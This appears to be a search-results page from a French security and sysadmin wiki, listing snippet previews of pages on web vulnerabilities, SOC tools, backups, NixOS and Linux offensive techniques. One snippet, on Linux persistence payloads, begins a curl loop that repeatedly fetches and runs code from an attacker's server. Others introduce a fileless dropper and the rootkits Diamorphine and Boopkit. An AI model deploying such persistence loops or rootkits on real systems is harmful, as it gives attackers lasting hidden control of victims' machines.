Advanced Search
Search Results
286 total results found
[Exploitation/Web] SSTI
Introduction La vulnérabilité SSTI, pour Server-Side Template Injection, permet à un attaquant d’injecter du code malveillant dans un moteur de template côté serveur, pouvant conduire à l’exécution de commandes à distance. Cette faille va exploiter les moteur...
[Exploitation/Web] XSLT
Introduction La vulnérabilité XSLT (Extensible Stylesheet Language Transformations) survient lorsqu’un moteur de transformation XML mal sécurisé permet à un attaquant d’injecter ou d’exécuter du code XSLT arbitraire, pouvant mener à l’exfiltration de données,...
[Exploitation/Web] Déserialisation
Introduction Parfois, le serveur web a besoin d'enregistrer des données dans un fichier pour les recharger à un autre moment. Il fait donc de la sérialisation pour enregistrer un ou plusieurs objets (POO) puis de la déserialisation pour reconstruire les objet...
[SOC] Graylog
Introduction Graylog est un SIEM qui permet de centraliser vos logs et de faire des queries pour faire des analyses de threat hunting notamment. Sources https://www.it-connect.fr/tuto-graylog-sur-debian-centraliser-et-analyser-logs/ https://www.it-co...
[SOC] Cyberchef
Introduction Cyberchef est un outil pour décoder, formater etc très utile en CTF ou dans les tâches quotidiennes. Sources https://gchq.github.io/CyberChef/ https://kravensecurity.com/cyberchef-guide/#CyberChef Cyberchef API Un projet a été réalisé,...
[Stegano] Audio
Introduction Il est possible de cacher de l'information dans des fichiers audio comme des fichiers WAV grâce à des logiciels comme Coagula. On peut ensuite retrouver ces messages dans des logiciels comme Audacity. Source https://medium.com/@AungKyawZall/...
[Busybox] Cheat-sheet
Introduction Busybox est une boîte à outils qui embarque beaucoup de binaires basiques et très pratiques pour dépanner ou effectuer tout un tas de tâches. Il peut aussi très bien être détourné pour être utilisé à des fins malveillantes. Cheat-sheet Aide ...
[NixOS] Cheat-sheet
Introduction NixOS est une distribution Linux qui utilise un fichier de configuration pour construire une image qui sera répliquable sur n'importe quelle configuration. Ressources https://search.nixos.org/packages?channel=25.05 https://search.nixos.org...
[Backup] Restic
Introduction Restic est un outil qui permet de faire des sauvegardes comme pourrait le faire borg. À noter qu'il supporte différents protocoles et qu'il permet d'envoyer des backups via ssh notamment. Il protège aussi les backups avec un mot de passe par défa...
[Persistence/Linux] Payloads
Introduction Cette page référence quelque payloads prêt à l'emploi pour de la persistance Linux. Payloads curl Le payload suivant va récupérer la charge sur le serveur web de l'attaquant toutes les 60 secondes et l'exécuter : while true; do curl -s http:/...
[Linux] Exécution de binaire en mode fileless
Introduction Cette technique consiste à exécuter des binaires sur un systèmes Linux sans qu'aucun fichier ne soit jamais écrit sur le disque. Pour cela, nous allons simplement utiliser un dropper en python qui va écouter continuellement sur le réseau pour ré...
[Linux] Diamorphine
Introduction Diamorphine est un rootkit Linux open source qui possède plusieurs fonctions : Masquer des processus Masquer des fichiers Backdoor utilisateur root Diamorphine Github https://github.com/m0nad/Diamorphine/tree/master Installation ...
[Linux] Boopkit
Introduction Boopkit est un rootkit open source qui exploite eBPF pour envoyer des payloads. Le gros avantage c'est qu'il ne va pas ouvrir de socket réseau pour fonctionner : il va se placer niveau kernel et intercepter tous les paquets réseaux qui passent pa...
[Debian] Raid ZFS
Introduction Le raid avec ZFS est considéré comme plus performant et plus moderne donc recommandable. Raid1 Identification des disques lsblk -o NAME,SIZE,MODEL,SERIAL ls -l /dev/disk/by-id/ | grep -E 'sda|sdb' Notez les identifiants (ata-XXXXX). Const...
[Splunk] SPL
Introduction Le SPL est le langage de requête propriétaire à Splunk. Il est extrêmement puissant mais utilise une syntaxe peu triviale. Cheat-sheet Index Pour chercher dans un index : index="main" Opérateurs Opérateurs = != > ...
[Proxmox] Exporter une VM de Virtualbox à Proxmox
Introduction Le passage d'une VM de Virtualbox à Proxmox n'est pas supporté de manière graphique dans Proxmox mais quelques lignes de commande assez simples permettent de réaliser ces opérations. Manuel La première étape est de copier le fichier de disque...